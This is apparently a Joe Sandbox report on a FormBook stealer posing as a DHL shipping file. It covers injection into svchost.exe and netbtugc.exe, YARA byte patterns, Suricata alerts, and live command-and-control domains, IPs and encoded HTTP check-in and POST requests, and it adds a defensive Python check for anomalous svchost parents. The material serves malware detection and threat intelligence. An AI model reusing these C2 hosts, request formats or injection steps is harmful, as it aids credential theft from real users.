
Windows Analysis Report
DHL 0737-12182024.exe

Overview

General Information

Sample name: DHL 0737-12182024.exe
Analysis ID: 1578024
MD5: ec3ba2f9b2d0b8236ac14326f17c2512
SHA1: 83868d22c1f3437a6ebc5cda29ad0d8cb75c43a6
SHA256: 15bb7ea4eaf34d92908626f1f1898e3bdc5a19fd086df4808a590c00c7285d74
Tags: DHL, exe, user-abuse_ch

Detection

FormBook
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus detection for URL or domain
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected FormBook
AI detected suspicious sample
Binary is likely a compiled AutoIt script file
Found API chain indicative of sandbox detection
Found direct / indirect Syscall (likely to bypass EDR)
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Performs DNS queries to domains with low reputation
Queues an APC in another process (thread injection)
Switches to a custom stack to bypass stack traces
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Writes to foreign memory regions
AV process strings found (often used to terminate AV products)
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to block mouse and keyboard input (often used to hinder debugging)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to execute programs as a different user
Contains functionality to launch a process as a different user
Contains functionality to launch a program with higher privileges
Contains functionality to modify clipboard data
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality to simulate keystroke presses
Contains functionality to simulate mouse events
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
OS version to string mapping found (often used in BOTs)
Potential key logger detected (key state polling based)
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Uncommon Svchost Parent Process
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

(classification chart not reproduced in this export)

Process Tree

  • System is w10x64
  • DHL 0737-12182024.exe (PID: 5876 cmdline: "C:\Users\user\Desktop\DHL 0737-12182024.exe" MD5: EC3BA2F9B2D0B8236AC14326F17C2512)
    • svchost.exe (PID: 7120 cmdline: "C:\Users\user\Desktop\DHL 0737-12182024.exe" MD5: 1ED18311E3DA35942DB37D15FA40CC5B)
      • MPhqOtiHUlL.exe (PID: 3660 cmdline: "C:\Program Files (x86)\umeNdySDdvdekbBjvsFCGOcUZgbEDfrSVyColahOtoqffWkTCaAJeFNKqtZzCrf\MPhqOtiHUlL.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
        • netbtugc.exe (PID: 5260 cmdline: "C:\Windows\SysWOW64\netbtugc.exe" MD5: EE7BBA75B36D54F9E420EB6EE960D146)
          • MPhqOtiHUlL.exe (PID: 5956 cmdline: "C:\Program Files (x86)\umeNdySDdvdekbBjvsFCGOcUZgbEDfrSVyColahOtoqffWkTCaAJeFNKqtZzCrf\MPhqOtiHUlL.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
          • firefox.exe (PID: 7056 cmdline: "C:\Program Files\Mozilla Firefox\Firefox.exe" MD5: C86B1BE9ED6496FE0E0CBE73F81D8045)
  • cleanup
No configs have been found
Source | Rule | Description | Author | Strings

00000004.00000002.4523238196.0000000002C10000.00000040.80000000.00040000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security
00000004.00000002.4523238196.0000000002C10000.00000040.80000000.00040000.00000000.sdmp | Windows_Trojan_Formbook_1112e116 | unknown | unknown
  • 0x2a6e0:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
  • 0x13d7f:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
00000004.00000002.4524618858.00000000030E0000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security
00000004.00000002.4524618858.00000000030E0000.00000004.00000800.00020000.00000000.sdmp | Windows_Trojan_Formbook_1112e116 | unknown | unknown
  • 0x2a6e0:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
  • 0x13d7f:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
00000002.00000002.2226323346.0000000003710000.00000040.10000000.00040000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security
(11 entries in total; the remaining entries are not shown here)
Source | Rule | Description | Author | Strings

2.2.svchost.exe.400000.0.unpack | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security
2.2.svchost.exe.400000.0.unpack | Windows_Trojan_Formbook_1112e116 | unknown | unknown
  • 0x2d063:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
  • 0x16702:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
2.2.svchost.exe.400000.0.raw.unpack | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security
2.2.svchost.exe.400000.0.raw.unpack | Windows_Trojan_Formbook_1112e116 | unknown | unknown
  • 0x2de63:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
  • 0x17502:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01

            System Summary

Source: Process started; Author: Florian Roth (Nextron Systems); Data: Command: "C:\Users\user\Desktop\DHL 0737-12182024.exe", CommandLine: "C:\Users\user\Desktop\DHL 0737-12182024.exe", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\DHL 0737-12182024.exe", ParentImage: C:\Users\user\Desktop\DHL 0737-12182024.exe, ParentProcessId: 5876, ParentProcessName: DHL 0737-12182024.exe, ProcessCommandLine: "C:\Users\user\Desktop\DHL 0737-12182024.exe", ProcessId: 7120, ProcessName: svchost.exe
Source: Process started; Author: vburov; Data: Command: "C:\Users\user\Desktop\DHL 0737-12182024.exe", CommandLine: "C:\Users\user\Desktop\DHL 0737-12182024.exe", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\DHL 0737-12182024.exe", ParentImage: C:\Users\user\Desktop\DHL 0737-12182024.exe, ParentProcessId: 5876, ParentProcessName: DHL 0737-12182024.exe, ProcessCommandLine: "C:\Users\user\Desktop\DHL 0737-12182024.exe", ProcessId: 7120, ProcessName: svchost.exe
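The two Sigma hits above carry the fields a SOC analyst pivots on: svchost.exe (PID 7120) was created by the sample (PID 5876) rather than by the service control manager, and its command line names the parent's executable rather than svchost.exe, which is what a create-suspended-and-inject sequence leaves behind. The Python below is an added example, not Joe Sandbox or Sigma code. It generalizes the first hit into a parent check and adds a second, independent check (image versus the executable named in the command line) that the Sigma rules above do not express. The parent allow-list, the benign control event and its PIDs are assumptions for the example; the first event is built from the fields shown in the hits.

```python
"""Process-creation checks for the svchost.exe anomaly in this report.

Added example: not Joe Sandbox or Sigma code. ALLOWED_SVCHOST_PARENTS is an
assumed allow-list for the example, not the list used by the Sigma rules.
"""
from dataclasses import dataclass
from pathlib import PureWindowsPath

# Processes that normally start svchost.exe on Windows 10 (assumed; baseline
# this against your own telemetry before deploying).
ALLOWED_SVCHOST_PARENTS = {"services.exe", "msmpeng.exe", "ngen.exe"}


@dataclass(frozen=True)
class ProcessEvent:
    """Subset of a Sysmon event ID 1 / Security 4688 process-creation record."""
    process_id: int
    image: str
    command_line: str
    parent_process_id: int
    parent_image: str


def basename(path: str) -> str:
    return PureWindowsPath(path).name.lower()


def executable_in_command_line(command_line: str) -> str:
    """Executable a command line names: the quoted path, or the first token."""
    s = command_line.strip()
    if s.startswith('"'):
        end = s.find('"', 1)
        exe = s[1:end] if end > 0 else s[1:]
    else:
        exe = s.split(" ", 1)[0]
    return basename(exe)


def check_event(ev: ProcessEvent) -> list[str]:
    """Return human-readable findings for one process-creation event."""
    findings = []
    image = basename(ev.image)
    parent = basename(ev.parent_image)
    # 1. svchost.exe started by something other than an expected service host parent.
    if image == "svchost.exe" and parent not in ALLOWED_SVCHOST_PARENTS:
        findings.append(f"svchost.exe started by uncommon parent {parent} "
                        f"(parent pid {ev.parent_process_id})")
    # 2. Image on disk differs from the executable the command line names.
    #    A process created suspended by an injector keeps the command line the
    #    injector passed to CreateProcess, so the two stop matching.
    claimed = executable_in_command_line(ev.command_line)
    if claimed and claimed != image:
        findings.append(f"image {image} runs with the command line of {claimed}")
    return findings


def scan(events) -> dict[int, list[str]]:
    """Map process id -> findings, keeping only events that raised something."""
    result = {}
    for ev in events:
        f = check_event(ev)
        if f:
            result[ev.process_id] = f
    return result


# Event built from the fields in the two Sigma hits of this report.
REPORT_EVENT = ProcessEvent(
    process_id=7120,
    image=r"C:\Windows\SysWOW64\svchost.exe",
    command_line=r'"C:\Users\user\Desktop\DHL 0737-12182024.exe"',
    parent_process_id=5876,
    parent_image=r"C:\Users\user\Desktop\DHL 0737-12182024.exe",
)
# Constructed benign control (PIDs invented): a service host started normally.
BENIGN_EVENT = ProcessEvent(
    process_id=1000,
    image=r"C:\Windows\System32\svchost.exe",
    command_line=r"C:\Windows\System32\svchost.exe -k netsvcs -p",
    parent_process_id=700,
    parent_image=r"C:\Windows\System32\services.exe",
)

if __name__ == "__main__":
    for pid, findings in scan([REPORT_EVENT, BENIGN_EVENT]).items():
        print(pid, findings)
```

Both checks fire on the report's svchost.exe and neither fires on the control. The mismatch check has a blind spot worth knowing: netbtugc.exe further down the tree is launched with its own path as command line, so it passes both tests even though it is also an injection target here; pair these process-creation checks with the memory-write and APC telemetry the signatures above describe rather than relying on them alone.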
Timestamp                        SID      Severity  Classtype                                      Source IP    Source Port  Destination IP   Destination Port  Protocol
2024-12-19T07:50:35.888894+0100  2050745  1         Malware Command and Control Activity Detected  192.168.2.5  49740        154.215.72.110   80                TCP
2024-12-19T07:51:09.555891+0100  2050745  1         Malware Command and Control Activity Detected  192.168.2.5  49819        116.50.37.244    80                TCP
2024-12-19T07:52:32.960227+0100  2050745  1         Malware Command and Control Activity Detected  192.168.2.5  49877        85.159.66.93     80                TCP
2024-12-19T07:52:47.659862+0100  2050745  1         Malware Command and Control Activity Detected  192.168.2.5  49988        91.195.240.94    80                TCP
2024-12-19T07:53:11.238787+0100  2050745  1         Malware Command and Control Activity Detected  192.168.2.5  49992        66.29.149.46     80                TCP
2024-12-19T07:53:26.602852+0100  2050745  1         Malware Command and Control Activity Detected  192.168.2.5  49996        195.110.124.133  80                TCP
2024-12-19T07:53:57.895694+0100  2050745  1         Malware Command and Control Activity Detected  192.168.2.5  50000        217.196.55.202   80                TCP


            AV Detection

Source: http://www.goldenjade-travel.com/fo8o/?sLRH=86fTArmPbL&UT5tTdKX=LFKqyrcu7g1NCa8cV1r2tNkohroduT6prIMLtaWgKJ9bBKQr4dsnyMPFpMQjJLGR7ieyxupOSpv1HbfUaMaFwgsmgn0tjJUfda6vPucKXgoaEer/I3bJmMi6r+vCyLgXuQ==; Avira URL Cloud: Label: malware
Source: http://www.elettrosistemista.zip/fo8o/?sLRH=86fTArmPbL&UT5tTdKX=bO1UBvtoHFNUmlWGmXL3o3L5Dhw+Vy81qF418M7UHpKKa2cgLZsmM/SsbGGojtls67Xc6OgTo57aJm1+bsxMNglie/alwGrbjt4sQOb9JZJseQvAkmnJhBfN0CPURydTcQ==; Avira URL Cloud: Label: malware
Source: http://www.rssnewscast.com/fo8o/?UT5tTdKX=x3jV/ECx7FuzXOI5niBKCyXhuUkTi7THyCIVaqWvGMMqpfz0YC5wLsL1wYxwFH1KuInYTmXKqKNNujOvwtdNo7YSnSe3b06z1hRjejs3ag7OBngOhxFR5lEHJntjOPFYJw==&sLRH=86fTArmPbL; Avira URL Cloud: Label: malware
Source: DHL 0737-12182024.exe; ReversingLabs: Detection: 57%
Source: Yara match; File source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match; File source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match; File source: 00000004.00000002.4523238196.0000000002C10000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: 00000004.00000002.4524618858.00000000030E0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: 00000002.00000002.2226323346.0000000003710000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: 00000006.00000002.4526783594.0000000004EA0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: 00000002.00000002.2225605698.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: 00000004.00000002.4524568253.00000000030A0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: 00000003.00000002.4524627388.0000000004530000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: 00000002.00000002.2227031882.0000000005E00000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Submitted Sample; Integrated Neural Analysis Model: Matched 100.0% probability
Source: DHL 0737-12182024.exe; Joe Sandbox ML: detected
Source: DHL 0737-12182024.exe; Static PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
            Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: MPhqOtiHUlL.exe, 00000003.00000002.4524073743.0000000000DCE000.00000002.00000001.01000000.00000004.sdmp, MPhqOtiHUlL.exe, 00000006.00000000.2293045863.0000000000DCE000.00000002.00000001.01000000.00000004.sdmp
            Source: Binary string: wntdll.pdbUGP source: DHL 0737-12182024.exe, 00000000.00000003.2072424792.0000000003570000.00000004.00001000.00020000.00000000.sdmp, DHL 0737-12182024.exe, 00000000.00000003.2073603863.00000000033D0000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2129558471.0000000003700000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2226481868.0000000003900000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2226481868.0000000003A9E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2128074509.0000000003500000.00000004.00000020.00020000.00000000.sdmp, netbtugc.exe, 00000004.00000003.2225656804.000000000315B000.00000004.00000020.00020000.00000000.sdmp, netbtugc.exe, 00000004.00000002.4524933921.00000000034C0000.00000040.00001000.00020000.00000000.sdmp, netbtugc.exe, 00000004.00000003.2228176846.000000000330F000.00000004.00000020.00020000.00000000.sdmp, netbtugc.exe, 00000004.00000002.4524933921.000000000365E000.00000040.00001000.00020000.00000000.sdmp
            Source: Binary string: wntdll.pdb source: DHL 0737-12182024.exe, 00000000.00000003.2072424792.0000000003570000.00000004.00001000.00020000.00000000.sdmp, DHL 0737-12182024.exe, 00000000.00000003.2073603863.00000000033D0000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, svchost.exe, 00000002.00000003.2129558471.0000000003700000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2226481868.0000000003900000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2226481868.0000000003A9E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2128074509.0000000003500000.00000004.00000020.00020000.00000000.sdmp, netbtugc.exe, 00000004.00000003.2225656804.000000000315B000.00000004.00000020.00020000.00000000.sdmp, netbtugc.exe, 00000004.00000002.4524933921.00000000034C0000.00000040.00001000.00020000.00000000.sdmp, netbtugc.exe, 00000004.00000003.2228176846.000000000330F000.00000004.00000020.00020000.00000000.sdmp, netbtugc.exe, 00000004.00000002.4524933921.000000000365E000.00000040.00001000.00020000.00000000.sdmp
            Source: Binary string: netbtugc.pdb source: svchost.exe, 00000002.00000003.2191743013.000000000321A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2226000633.0000000003200000.00000004.00000020.00020000.00000000.sdmp, MPhqOtiHUlL.exe, 00000003.00000002.4523724213.0000000000868000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: svchost.pdb source: netbtugc.exe, 00000004.00000002.4525505296.0000000003AEC000.00000004.10000000.00040000.00000000.sdmp, netbtugc.exe, 00000004.00000002.4523547041.0000000002DEE000.00000004.00000020.00020000.00000000.sdmp, MPhqOtiHUlL.exe, 00000006.00000002.4524926192.0000000002A6C000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000007.00000002.2513390369.00000000213FC000.00000004.80000000.00040000.00000000.sdmp
            Source: Binary string: svchost.pdbUGP source: netbtugc.exe, 00000004.00000002.4525505296.0000000003AEC000.00000004.10000000.00040000.00000000.sdmp, netbtugc.exe, 00000004.00000002.4523547041.0000000002DEE000.00000004.00000020.00020000.00000000.sdmp, MPhqOtiHUlL.exe, 00000006.00000002.4524926192.0000000002A6C000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000007.00000002.2513390369.00000000213FC000.00000004.80000000.00040000.00000000.sdmp
            Source: Binary string: netbtugc.pdbGCTL source: svchost.exe, 00000002.00000003.2191743013.000000000321A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2226000633.0000000003200000.00000004.00000020.00020000.00000000.sdmp, MPhqOtiHUlL.exe, 00000003.00000002.4523724213.0000000000868000.00000004.00000020.00020000.00000000.sdmp
Source: C:\Users\user\Desktop\DHL 0737-12182024.exe; Code function: 0_2_0088DBBE lstrlenW,GetFileAttributesW,FindFirstFileW,FindClose,0_2_0088DBBE
Source: C:\Users\user\Desktop\DHL 0737-12182024.exe; Code function: 0_2_0085C2A2 FindFirstFileExW,0_2_0085C2A2
Source: C:\Users\user\Desktop\DHL 0737-12182024.exe; Code function: 0_2_008968EE FindFirstFileW,FindClose,0_2_008968EE
Source: C:\Users\user\Desktop\DHL 0737-12182024.exe; Code function: 0_2_0089698F FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToSystemTime,FileTimeToSystemTime,0_2_0089698F
Source: C:\Users\user\Desktop\DHL 0737-12182024.exe; Code function: 0_2_0088D076 FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,0_2_0088D076
Source: C:\Users\user\Desktop\DHL 0737-12182024.exe; Code function: 0_2_0088D3A9 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,0_2_0088D3A9
Source: C:\Users\user\Desktop\DHL 0737-12182024.exe; Code function: 0_2_00899642 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_00899642
Source: C:\Users\user\Desktop\DHL 0737-12182024.exe; Code function: 0_2_0089979D SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_0089979D
Source: C:\Users\user\Desktop\DHL 0737-12182024.exe; Code function: 0_2_00899B2B FindFirstFileW,Sleep,FindNextFileW,FindClose,0_2_00899B2B
Source: C:\Users\user\Desktop\DHL 0737-12182024.exe; Code function: 0_2_00895C97 FindFirstFileW,FindNextFileW,FindClose,0_2_00895C97

            Networking

Source: Network traffic; Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.5:49740 -> 154.215.72.110:80
Source: Network traffic; Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.5:49819 -> 116.50.37.244:80
Source: Network traffic; Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.5:49996 -> 195.110.124.133:80
Source: Network traffic; Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.5:49877 -> 85.159.66.93:80
Source: Network traffic; Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.5:49992 -> 66.29.149.46:80
Source: Network traffic; Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.5:50000 -> 217.196.55.202:80
Source: Network traffic; Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.5:49988 -> 91.195.240.94:80
Source: DNS query: www.joyesi.xyz
Source: Joe Sandbox View; IP Address: 91.195.240.94
Source: Joe Sandbox View; IP Address: 154.215.72.110
Source: unknown; UDP traffic detected without corresponding DNS query: 1.1.1.1 (18 occurrences)
Source: C:\Users\user\Desktop\DHL 0737-12182024.exe; Code function: 0_2_0089CE44 InternetReadFile,SetEvent,GetLastError,SetEvent,0_2_0089CE44
Source: global traffic; HTTP traffic detected:
  GET /fo8o/?sLRH=86fTArmPbL&UT5tTdKX=IhZyPQIGe6uK3zP3twZWsYVeSSeNS0ZlW2eS79Xk6ut4afzj0LiRBEeFtQixSzG192fRs1GD25A478p7nOOnzIiuR4u4IIkzi3Kqqtd6zR7shSxwh28NyLEf3/mFmUyU2g== HTTP/1.1
  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
  Accept-Language: en-US,en
  Host: www.3xfootball.com
  Connection: close
  User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
Source: global traffic; HTTP traffic detected:
  GET /fo8o/?sLRH=86fTArmPbL&UT5tTdKX=LFKqyrcu7g1NCa8cV1r2tNkohroduT6prIMLtaWgKJ9bBKQr4dsnyMPFpMQjJLGR7ieyxupOSpv1HbfUaMaFwgsmgn0tjJUfda6vPucKXgoaEer/I3bJmMi6r+vCyLgXuQ== HTTP/1.1
  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
  Accept-Language: en-US,en
  Host: www.goldenjade-travel.com
  Connection: close
  User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
Source: global traffic; HTTP traffic detected:
  GET /fo8o/?sLRH=86fTArmPbL&UT5tTdKX=qL3nKp+YSjoaTomgQjyPoknaJzFflnvGMW8DXsDTZ4AADrD7Wpn1i04piMS1+AOWgCBMohpgbh6Cuut9PSzjMWAnWKRmrKgMQiWi7WA8E0wwbeEcZziILA/VBeUyRYh4cA== HTTP/1.1
  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
  Accept-Language: en-US,en
  Host: www.magmadokum.com
  Connection: close
  User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
Source: global traffic; HTTP traffic detected:
  GET /fo8o/?UT5tTdKX=x3jV/ECx7FuzXOI5niBKCyXhuUkTi7THyCIVaqWvGMMqpfz0YC5wLsL1wYxwFH1KuInYTmXKqKNNujOvwtdNo7YSnSe3b06z1hRjejs3ag7OBngOhxFR5lEHJntjOPFYJw==&sLRH=86fTArmPbL HTTP/1.1
  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
  Accept-Language: en-US,en
  Host: www.rssnewscast.com
  Connection: close
  User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
Source: global traffic; HTTP traffic detected:
  GET /fo8o/?UT5tTdKX=vefd0teQh+kbruh5/qap98pA+QvvtGaRDgCUoL90YCYLczV+Hcc/TcCCUPfrz9W5FQiF6ivoXpNecnmrfO5hboQSxRfFXXJhWlOcLO2B4JSrf1qenLAzZaPHfWrFdh0bEA==&sLRH=86fTArmPbL HTTP/1.1
  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
  Accept-Language: en-US,en
  Host: www.techchains.info
  Connection: close
  User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
Source: global traffic; HTTP traffic detected:
  GET /fo8o/?sLRH=86fTArmPbL&UT5tTdKX=bO1UBvtoHFNUmlWGmXL3o3L5Dhw+Vy81qF418M7UHpKKa2cgLZsmM/SsbGGojtls67Xc6OgTo57aJm1+bsxMNglie/alwGrbjt4sQOb9JZJseQvAkmnJhBfN0CPURydTcQ== HTTP/1.1
  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
  Accept-Language: en-US,en
  Host: www.elettrosistemista.zip
  Connection: close
  User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
Source: global traffic; HTTP traffic detected:
  GET /fo8o/?UT5tTdKX=mxnR+iHPFb8HZiaBBOLBDF0OC7azb6MRPLEBGwFodGelSqoCQiBwPqu0WU7djgVoJgj4cKk6Pp6Q/yIaSghKZS1b6NbCHbQEZbfQfUSvJErRJZB76jwKK/37UG0r+NzcRQ==&sLRH=86fTArmPbL HTTP/1.1
  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
  Accept-Language: en-US,en
  Host: www.empowermedeco.com
  Connection: close
  User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
Source: global traffic; DNS traffic detected: DNS query: www.3xfootball.com
Source: global traffic; DNS traffic detected: DNS query: www.kasegitai.tokyo
Source: global traffic; DNS traffic detected: DNS query: www.goldenjade-travel.com
Source: global traffic; DNS traffic detected: DNS query: www.antonio-vivaldi.mobi
Source: global traffic; DNS traffic detected: DNS query: www.magmadokum.com
Source: global traffic; DNS traffic detected: DNS query: www.rssnewscast.com
Source: global traffic; DNS traffic detected: DNS query: www.liangyuen528.com
Source: global traffic; DNS traffic detected: DNS query: www.techchains.info
Source: global traffic; DNS traffic detected: DNS query: www.elettrosistemista.zip
Source: global traffic; DNS traffic detected: DNS query: www.donnavariedades.com
Source: global traffic; DNS traffic detected: DNS query: www.660danm.top
Source: global traffic; DNS traffic detected: DNS query: www.empowermedeco.com
Source: global traffic; DNS traffic detected: DNS query: www.joyesi.xyz
Source: global traffic; DNS traffic detected: DNS query: www.k9vyp11no3.cfd
Source: global traffic; DNS traffic detected: DNS query: www.shenzhoucui.com
Source: global traffic; DNS traffic detected: DNS query: www.b301.space
Source: unknown; HTTP traffic detected:
  POST /fo8o/ HTTP/1.1
  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
  Accept-Language: en-US,en
  Accept-Encoding: gzip, deflate, br
  Host: www.goldenjade-travel.com
  Origin: http://www.goldenjade-travel.com
  Cache-Control: no-cache
  Connection: close
  Content-Type: application/x-www-form-urlencoded
  Content-Length: 209
  Referer: http://www.goldenjade-travel.com/fo8o/
  User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
